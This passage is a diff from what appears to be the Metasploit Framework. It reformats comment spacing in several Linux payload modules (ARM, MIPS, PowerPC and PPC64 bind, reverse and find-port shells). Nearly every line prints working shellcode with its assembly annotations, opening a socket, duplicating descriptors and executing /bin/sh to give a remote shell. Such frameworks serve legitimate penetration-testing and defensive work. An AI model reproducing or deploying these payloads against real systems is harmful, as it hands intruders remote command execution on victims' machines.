+            "\x6a\x5a"             + #   pushl   $0x5a                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xff\x4f\xe8"         + #   decl    -0x18(%edi)                #
+            "\x79\xf6"             + #   jns     <cntsockcode+34>           #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
             "\xcd\x80"              #   int     $0x80                      #
         }
     ))

--- a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
@@ -41,74 +41,74 @@ module MetasploitModule
 
     payload =
             # turning on thumb mode
-            "\xe2\x8f\x60\x01"	+#	add 	r6, pc, #1	#
-            "\xe1\x2f\xff\x16"	+#	bx	r6		#
+            "\xe2\x8f\x60\x01"	+ #	add 	r6, pc, #1	#
+            "\xe1\x2f\xff\x16"	+ #	bx	r6		#
 
             # thumb mode on
             # socket(2,1,0)
-            "\x1a\x92"		+#	sub	r2, r2, r2	#
-            "\x1c\x51"		+#	add	r1, r2, #1	#
-            "\x1c\x90"		+#	add	r0, r2, #2	#
-            "\x02\x0f"		+#	lsl	r7, r1, #8	#
-            "\x37\x19"		+#	add	r7, r7, #0x19	#
-            "\xdf\x01"		+#	svc	1		#
-            "\x1c\x06"		+#	mov	r6, r0		#
+            "\x1a\x92"		+ #	sub	r2, r2, r2	#
+            "\x1c\x51"		+ #	add	r1, r2, #1	#
+            "\x1c\x90"		+ #	add	r0, r2, #2	#
+            "\x02\x0f"		+ #	lsl	r7, r1, #8	#
+            "\x37\x19"		+ #	add	r7, r7, #0x19	#
+            "\xdf\x01"		+ #	svc	1		#
+            "\x1c\x06"		+ #	mov	r6, r0		#
 
             # bind()
-            "\x22\x02"		+#	mov	r2, #2		#
-            "\x02\x12"		+#	lsl	r2, r2, #8	#
-            "\x32"+bytehigh	+#	add	r2, r2, #0xXX	#
-            "\x02\x12"		+#	lsl	r2, r2, #8	#
-            "\x32"+bytelow	+#	add	r2, r2, #0xXX	#
-            "\x1a\xdb"		+#	sub	r3, r3, r3	#
-            "\x1b\x24"		+#	sub	r4, r4, r4	#
-            "\x1b\x6d"		+#	sub 	r5, r5, r5	#
-            "\x46\x69"		+#	mov	r1, sp		#
-            "\xc1\x3c"		+#	stm	r1!, {r2-r5}	#
-            "\x39\x10"		+#	sub	r1, #0x10	#
-            "\x22\x10"		+#	mov	r2, #16		#
-            "\x37\x01"		+#	add	r7, r7, #1	#
-            "\xdf\x01"		+#	svc	1		#
+            "\x22\x02"		+ #	mov	r2, #2		#
+            "\x02\x12"		+ #	lsl	r2, r2, #8	#
+            "\x32"+bytehigh	+ #	add	r2, r2, #0xXX	#
+            "\x02\x12"		+ #	lsl	r2, r2, #8	#
+            "\x32"+bytelow	+ #	add	r2, r2, #0xXX	#
+            "\x1a\xdb"		+ #	sub	r3, r3, r3	#
+            "\x1b\x24"		+ #	sub	r4, r4, r4	#
+            "\x1b\x6d"		+ #	sub 	r5, r5, r5	#
+            "\x46\x69"		+ #	mov	r1, sp		#
+            "\xc1\x3c"		+ #	stm	r1!, {r2-r5}	#
+            "\x39\x10"		+ #	sub	r1, #0x10	#
+            "\x22\x10"		+ #	mov	r2, #16		#
+            "\x37\x01"		+ #	add	r7, r7, #1	#
+            "\xdf\x01"		+ #	svc	1		#
 
             # listen()
-            "\x1c\x30"		+#	mov	r0, r6		#
-            "\x1a\x49"		+#	sub	r1, r1, r1	#
-            "\x37\x02"		+#	add	r7, r7, #2	#
-            "\xdf\x01"		+#	svc	1		#
+            "\x1c\x30"		+ #	mov	r0, r6		#
+            "\x1a\x49"		+ #	sub	r1, r1, r1	#
+            "\x37\x02"		+ #	add	r7, r7, #2	#
+            "\xdf\x01"		+ #	svc	1		#
 
             # accept()
-            "\x1c\x30"		+#	mov	r0, r6		#
-            "\x1a\x92"		+#	sub	r2, r2, r2	#
-            "\x37\x01"		+#	add	r7, r7, #1	#
-            "\xdf\x01"		+#	svc	1		#
-            "\x1c\x06"		+#	mov	r6, r0		#
+            "\x1c\x30"		+ #	mov	r0, r6		#
+            "\x1a\x92"		+ #	sub	r2, r2, r2	#
+            "\x37\x01"		+ #	add	r7, r7, #1	#
+            "\xdf\x01"		+ #	svc	1		#
+            "\x1c\x06"		+ #	mov	r6, r0		#
 
             # dup2()
-            "\x1a\x49"		+#	sub	r1, r1, r1	#
-            "\x27\x3f"		+#	mov	r7, #63	#
-            "\xdf\x01"		+#	svc     1		#
-            "\x1c\x30"		+#	mov	r0, r6	#
-            "\x31\x01"		+#	add	r1, r1, #1	#
-            "\xdf\x01"		+#	svc     1		#
-            "\x1c\x30"		+#	mov	r0, r6	#
-            "\x31\x01"		+#	add	r1, r1, #1	#
-            "\xdf\x01"		+#	svc     1		#
+            "\x1a\x49"		+ #	sub	r1, r1, r1	#
+            "\x27\x3f"		+ #	mov	r7, #63	#
+            "\xdf\x01"		+ #	svc     1		#
+            "\x1c\x30"		+ #	mov	r0, r6	#
+            "\x31\x01"		+ #	add	r1, r1, #1	#
+            "\xdf\x01"		+ #	svc     1		#
+            "\x1c\x30"		+ #	mov	r0, r6	#
+            "\x31\x01"		+ #	add	r1, r1, #1	#
+            "\xdf\x01"		+ #	svc     1		#
 
             # execve()
-            "\x1a\x92"		+#	sub	r2, r2, r2	#
-            "\x46\x78"		+#	mov 	r0, pc		#
-            "\x30\x12"		+#	add 	r0, #18		#
-            "\x92\x02"		+#	str	r2, [sp, #8]	#
-            "\x90\x01"		+#	str	r0, [sp, #4]	#
-            "\xa9\x01"		+#	add 	r1, sp, #4	#
-            "\x27\x0b"		+#	mov 	r7, #11		#
-            "\xdf\x01"		+#	svc 	1		#
+            "\x1a\x92"		+ #	sub	r2, r2, r2	#
+            "\x46\x78"		+ #	mov 	r0, pc		#
+            "\x30\x12"		+ #	add 	r0, #18		#
+            "\x92\x02"		+ #	str	r2, [sp, #8]	#
+            "\x90\x01"		+ #	str	r0, [sp, #4]	#
+            "\xa9\x01"		+ #	add 	r1, sp, #4	#
+            "\x27\x0b"		+ #	mov 	r7, #11		#
+            "\xdf\x01"		+ #	svc 	1		#
 
             # exit()
-            "\x1b\x24"		+#	sub	r4, r4, r4	#
-            "\x1c\x20"		+#	mov	r0, r4		#
-            "\x27\x01"		+#	mov 	r7, #1		#
-            "\xdf\x01"		+#	svc 	1		#
+            "\x1b\x24"		+ #	sub	r4, r4, r4	#
+            "\x1c\x20"		+ #	mov	r0, r4		#
+            "\x27\x01"		+ #	mov 	r7, #1		#
+            "\xdf\x01"		+ #	svc 	1		#
             cmd
   end
 end

--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -74,7 +74,7 @@ module MetasploitModule
       port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
       "\xe4\xff\xae\xaf" + # sw t6,-28(sp)
       host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
-      host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
+      host[0..1].pack("C2") + "\xce\x35" + # ori t6,t6,0x101
       "\xe6\xff\xae\xaf" + # sw t6,-26(sp)
       "\xe2\xff\xa5\x27" + # addiu a1,sp,-30
       "\xef\xff\x0c\x24" + # li t4,-17

--- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb
@@ -32,60 +32,60 @@ module MetasploitModule
               'LPORT'    => [ 58, 'n' ],
             },
           'Payload' =>
-            "\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
-            "\x3b\xa0\x01\xff"     +#   li      r29,511                    #
-            "\x3b\x9d\xfe\x02"     +#   addi    r28,r29,-510               #
-            "\x3b\x7d\xfe\x03"     +#   addi    r27,r29,-509               #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x97\x81\xff\xfc"     +#   stwu    r28,-4(r1)                 #
-            "\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x02"     +#   addi    r3,r29,-510                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
-            "\x3b\x3d\xfe\x11"     +#   addi    r25,r29,-495               #
-            "\x3e\xe0\xff\x02"     +#   lis     r23,-254                   #
-            "\x62\xf7\x04\xd2"     +#   ori     r23,r23,1234               #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x96\xe1\xff\xfc"     +#   stwu    r23,-4(r1)                 #
-            "\x7c\x36\x0b\x78"     +#   mr      r22,r1                     #
-            "\x97\x21\xff\xfc"     +#   stwu    r25,-4(r1)                 #
-            "\x96\xc1\xff\xfc"     +#   stwu    r22,-4(r1)                 #
-            "\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x03"     +#   addi    r3,r29,-509                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x05"     +#   addi    r3,r29,-507                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x06"     +#   addi    r3,r29,-506                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x75\x1b\x78"     +#   mr      r21,r3                     #
-            "\x7f\x64\xdb\x78"     +#   mr      r4,r27                     #
-            "\x7e\xa3\xab\x78"     +#   mr      r3,r21                     #
-            "\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x37\x7b\xff\xff"     +#   addic.  r27,r27,-1                 #
-            "\x40\x80\xff\xec"     +#   bge+    <bndsockcode+148>          #
-            "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-            "\x40\x82\xff\xfd"     +#   bnel+   <bndsockcode+172>          #
-            "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-            "\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
-            "\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
-            "\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
-            "\x94\xa1\xff\xfc"     +#   stwu    r5,-4(r1)                  #
-            "\x94\x61\xff\xfc"     +#   stwu    r3,-4(r1)                  #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
+            "\x7f\xff\xfa\x78"     + #   xor     r31,r31,r31                #
+            "\x3b\xa0\x01\xff"     + #   li      r29,511                    #
+            "\x3b\x9d\xfe\x02"     + #   addi    r28,r29,-510               #
+            "\x3b\x7d\xfe\x03"     + #   addi    r27,r29,-509               #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x97\x81\xff\xfc"     + #   stwu    r28,-4(r1)                 #
+            "\x97\x61\xff\xfc"     + #   stwu    r27,-4(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x02"     + #   addi    r3,r29,-510                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x7a\x1b\x78"     + #   mr      r26,r3                     #
+            "\x3b\x3d\xfe\x11"     + #   addi    r25,r29,-495               #
+            "\x3e\xe0\xff\x02"     + #   lis     r23,-254                   #
+            "\x62\xf7\x04\xd2"     + #   ori     r23,r23,1234               #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x96\xe1\xff\xfc"     + #   stwu    r23,-4(r1)                 #
+            "\x7c\x36\x0b\x78"     + #   mr      r22,r1                     #
+            "\x97\x21\xff\xfc"     + #   stwu    r25,-4(r1)                 #
+            "\x96\xc1\xff\xfc"     + #   stwu    r22,-4(r1)                 #
+            "\x97\x41\xff\xfc"     + #   stwu    r26,-4(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x03"     + #   addi    r3,r29,-509                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x97\x41\xff\xfc"     + #   stwu    r26,-4(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x05"     + #   addi    r3,r29,-507                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x06"     + #   addi    r3,r29,-506                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x75\x1b\x78"     + #   mr      r21,r3                     #
+            "\x7f\x64\xdb\x78"     + #   mr      r4,r27                     #
+            "\x7e\xa3\xab\x78"     + #   mr      r3,r21                     #
+            "\x38\x1d\xfe\x40"     + #   addi    r0,r29,-448                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x37\x7b\xff\xff"     + #   addic.  r27,r27,-1                 #
+            "\x40\x80\xff\xec"     + #   bge+    <bndsockcode+148>          #
+            "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+            "\x40\x82\xff\xfd"     + #   bnel+   <bndsockcode+172>          #
+            "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+            "\x3b\xde\x01\xff"     + #   addi    r30,r30,511                #
+            "\x38\x7e\xfe\x25"     + #   addi    r3,r30,-475                #
+            "\x98\xbe\xfe\x2c"     + #   stb     r5,-468(r30)               #
+            "\x94\xa1\xff\xfc"     + #   stwu    r5,-4(r1)                  #
+            "\x94\x61\xff\xfc"     + #   stwu    r3,-4(r1)                  #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x1d\xfe\x0c"     + #   addi    r0,r29,-500                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
             "/bin/sh"
         }
       ))

--- a/modules/payloads/singles/linux/ppc/shell_find_port.rb
+++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb
@@ -32,47 +32,47 @@ module MetasploitModule
               'CPORT' => [ 86, 'n' ],
             },
           'Payload' =>
-            "\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
-            "\x3b\xa0\x01\xff"     +#   li      r29,511                    #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x7c\x3c\x0b\x78"     +#   mr      r28,r1                     #
-            "\x3b\x7d\xfe\x11"     +#   addi    r27,r29,-495               #
-            "\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
-            "\x7c\x3a\x0b\x78"     +#   mr      r26,r1                     #
-            "\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
-            "\x97\x81\xff\xfc"     +#   stwu    r28,-4(r1)                 #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x3b\xff\x01\xff"     +#   addi    r31,r31,511                #
-            "\x3b\xff\xfe\x02"     +#   addi    r31,r31,-510               #
-            "\x38\x21\x01\xff"     +#   addi    r1,r1,511                  #
-            "\x38\x21\xfe\x05"     +#   addi    r1,r1,-507                 #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x08"     +#   addi    r3,r29,-504                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x3b\x3c\x01\xff"     +#   addi    r25,r28,511                #
-            "\xa3\x39\xfe\x03"     +#   lhz     r25,-509(r25)              #
-            "\x28\x19\x04\xd2"     +#   cmplwi  r25,1234                   #
-            "\x40\x82\xff\xd0"     +#   bne+    <fndsockcode+40>           #
-            "\x3b\x1d\xfe\x03"     +#   addi    r24,r29,-509               #
-            "\x7f\x04\xc3\x78"     +#   mr      r4,r24                     #
-            "\x7f\xe3\xfb\x78"     +#   mr      r3,r31                     #
-            "\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x37\x18\xff\xff"     +#   addic.  r24,r24,-1                 #
-            "\x40\x80\xff\xec"     +#   bge+    <fndsockcode+96>           #
-            "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-            "\x40\x82\xff\xfd"     +#   bnel+   <fndsockcode+120>          #
-            "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-            "\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
-            "\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
-            "\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
-            "\x94\xa1\xff\xfc"     +#   stwu    r5,-4(r1)                  #
-            "\x94\x61\xff\xfc"     +#   stwu    r3,-4(r1)                  #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
+            "\x7f\xff\xfa\x78"     + #   xor     r31,r31,r31                #
+            "\x3b\xa0\x01\xff"     + #   li      r29,511                    #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x7c\x3c\x0b\x78"     + #   mr      r28,r1                     #
+            "\x3b\x7d\xfe\x11"     + #   addi    r27,r29,-495               #
+            "\x97\x61\xff\xfc"     + #   stwu    r27,-4(r1)                 #
+            "\x7c\x3a\x0b\x78"     + #   mr      r26,r1                     #
+            "\x97\x41\xff\xfc"     + #   stwu    r26,-4(r1)                 #
+            "\x97\x81\xff\xfc"     + #   stwu    r28,-4(r1)                 #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x3b\xff\x01\xff"     + #   addi    r31,r31,511                #
+            "\x3b\xff\xfe\x02"     + #   addi    r31,r31,-510               #
+            "\x38\x21\x01\xff"     + #   addi    r1,r1,511                  #
+            "\x38\x21\xfe\x05"     + #   addi    r1,r1,-507                 #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x08"     + #   addi    r3,r29,-504                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x3b\x3c\x01\xff"     + #   addi    r25,r28,511                #
+            "\xa3\x39\xfe\x03"     + #   lhz     r25,-509(r25)              #
+            "\x28\x19\x04\xd2"     + #   cmplwi  r25,1234                   #
+            "\x40\x82\xff\xd0"     + #   bne+    <fndsockcode+40>           #
+            "\x3b\x1d\xfe\x03"     + #   addi    r24,r29,-509               #
+            "\x7f\x04\xc3\x78"     + #   mr      r4,r24                     #
+            "\x7f\xe3\xfb\x78"     + #   mr      r3,r31                     #
+            "\x38\x1d\xfe\x40"     + #   addi    r0,r29,-448                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x37\x18\xff\xff"     + #   addic.  r24,r24,-1                 #
+            "\x40\x80\xff\xec"     + #   bge+    <fndsockcode+96>           #
+            "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+            "\x40\x82\xff\xfd"     + #   bnel+   <fndsockcode+120>          #
+            "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+            "\x3b\xde\x01\xff"     + #   addi    r30,r30,511                #
+            "\x38\x7e\xfe\x25"     + #   addi    r3,r30,-475                #
+            "\x98\xbe\xfe\x2c"     + #   stb     r5,-468(r30)               #
+            "\x94\xa1\xff\xfc"     + #   stwu    r5,-4(r1)                  #
+            "\x94\x61\xff\xfc"     + #   stwu    r3,-4(r1)                  #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x1d\xfe\x0c"     + #   addi    r0,r29,-500                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
             "/bin/sh"
         }
       ))

--- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb
@@ -33,50 +33,50 @@ module MetasploitModule
               'LPORT'    => [ 62, 'n' ],
             },
           'Payload' =>
-            "\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
-            "\x3b\xa0\x01\xff"     +#   li      r29,511                    #
-            "\x3b\x9d\xfe\x02"     +#   addi    r28,r29,-510               #
-            "\x3b\x7d\xfe\x03"     +#   addi    r27,r29,-509               #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x97\x81\xff\xfc"     +#   stwu    r28,-4(r1)                 #
-            "\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x02"     +#   addi    r3,r29,-510                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
-            "\x3b\x3d\xfe\x11"     +#   addi    r25,r29,-495               #
-            "\x3e\xe0\x7f\x00"     +#   lis     r23,32512                  #
-            "\x62\xf7\x00\x01"     +#   ori     r23,r23,1                  #
-            "\x3a\xc0\x04\xd2"     +#   li      r22,1234                   #
-            "\x96\xe1\xff\xfc"     +#   stwu    r23,-4(r1)                 #
-            "\x96\xc1\xff\xfc"     +#   stwu    r22,-4(r1)                 #
-            "\x93\x61\xff\xfe"     +#   stw     r27,-2(r1)                 #
-            "\x7c\x35\x0b\x78"     +#   mr      r21,r1                     #
-            "\x97\x21\xff\xfc"     +#   stwu    r25,-4(r1)                 #
-            "\x96\xa1\xff\xfc"     +#   stwu    r21,-4(r1)                 #
-            "\x97\x41\xff\xfc"     +#   stwu    r26,-4(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x04"     +#   addi    r3,r29,-508                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7f\x64\xdb\x78"     +#   mr      r4,r27                     #
-            "\x7f\x43\xd3\x78"     +#   mr      r3,r26                     #
-            "\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x37\x7b\xff\xff"     +#   addic.  r27,r27,-1                 #
-            "\x40\x80\xff\xec"     +#   bge+    <cntsockcode+108>          #
-            "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-            "\x40\x82\xff\xfd"     +#   bnel+   <cntsockcode+132>          #
-            "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-            "\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
-            "\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
-            "\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
-            "\x94\xa1\xff\xfc"     +#   stwu    r5,-4(r1)                  #
-            "\x94\x61\xff\xfc"     +#   stwu    r3,-4(r1)                  #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
+            "\x7f\xff\xfa\x78"     + #   xor     r31,r31,r31                #
+            "\x3b\xa0\x01\xff"     + #   li      r29,511                    #
+            "\x3b\x9d\xfe\x02"     + #   addi    r28,r29,-510               #
+            "\x3b\x7d\xfe\x03"     + #   addi    r27,r29,-509               #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x97\x81\xff\xfc"     + #   stwu    r28,-4(r1)                 #
+            "\x97\x61\xff\xfc"     + #   stwu    r27,-4(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x02"     + #   addi    r3,r29,-510                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x7a\x1b\x78"     + #   mr      r26,r3                     #
+            "\x3b\x3d\xfe\x11"     + #   addi    r25,r29,-495               #
+            "\x3e\xe0\x7f\x00"     + #   lis     r23,32512                  #
+            "\x62\xf7\x00\x01"     + #   ori     r23,r23,1                  #
+            "\x3a\xc0\x04\xd2"     + #   li      r22,1234                   #
+            "\x96\xe1\xff\xfc"     + #   stwu    r23,-4(r1)                 #
+            "\x96\xc1\xff\xfc"     + #   stwu    r22,-4(r1)                 #
+            "\x93\x61\xff\xfe"     + #   stw     r27,-2(r1)                 #
+            "\x7c\x35\x0b\x78"     + #   mr      r21,r1                     #
+            "\x97\x21\xff\xfc"     + #   stwu    r25,-4(r1)                 #
+            "\x96\xa1\xff\xfc"     + #   stwu    r21,-4(r1)                 #
+            "\x97\x41\xff\xfc"     + #   stwu    r26,-4(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x04"     + #   addi    r3,r29,-508                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7f\x64\xdb\x78"     + #   mr      r4,r27                     #
+            "\x7f\x43\xd3\x78"     + #   mr      r3,r26                     #
+            "\x38\x1d\xfe\x40"     + #   addi    r0,r29,-448                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x37\x7b\xff\xff"     + #   addic.  r27,r27,-1                 #
+            "\x40\x80\xff\xec"     + #   bge+    <cntsockcode+108>          #
+            "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+            "\x40\x82\xff\xfd"     + #   bnel+   <cntsockcode+132>          #
+            "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+            "\x3b\xde\x01\xff"     + #   addi    r30,r30,511                #
+            "\x38\x7e\xfe\x25"     + #   addi    r3,r30,-475                #
+            "\x98\xbe\xfe\x2c"     + #   stb     r5,-468(r30)               #
+            "\x94\xa1\xff\xfc"     + #   stwu    r5,-4(r1)                  #
+            "\x94\x61\xff\xfc"     + #   stwu    r3,-4(r1)                  #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x1d\xfe\x0c"     + #   addi    r0,r29,-500                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
             "/bin/sh"
         }
       ))

--- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb
@@ -32,60 +32,60 @@ module MetasploitModule
               'LPORT'    => [ 58, 'n' ],
             },
           'Payload' =>
-            "\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
-            "\x3b\xa0\x01\xff"     +#   li      r29,511                    #
-            "\x3b\x9d\xfe\x02"     +#   addi    r28,r29,-510               #
-            "\x3b\x7d\xfe\x03"     +#   addi    r27,r29,-509               #
-            "\xfb\xe1\xff\xf9"     +#   stdu    r31,-8(r1)                 #
-            "\xfb\x81\xff\xf9"     +#   stdu    r28,-8(r1)                 #
-            "\xfb\x61\xff\xf9"     +#   stdu    r27,-8(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x02"     +#   addi    r3,r29,-510                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
-            "\x3b\x3d\xfe\x11"     +#   addi    r25,r29,-495               #
-            "\x3e\xe0\xff\x02"     +#   lis     r23,-254                   #
-            "\x62\xf7\x04\xd2"     +#   ori     r23,r23,1234               #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x96\xe1\xff\xfc"     +#   stwu    r23,-4(r1)                 #
-            "\x7c\x36\x0b\x78"     +#   mr      r22,r1                     #
-            "\xfb\x21\xff\xf9"     +#   stdu    r25,-8(r1)                 #
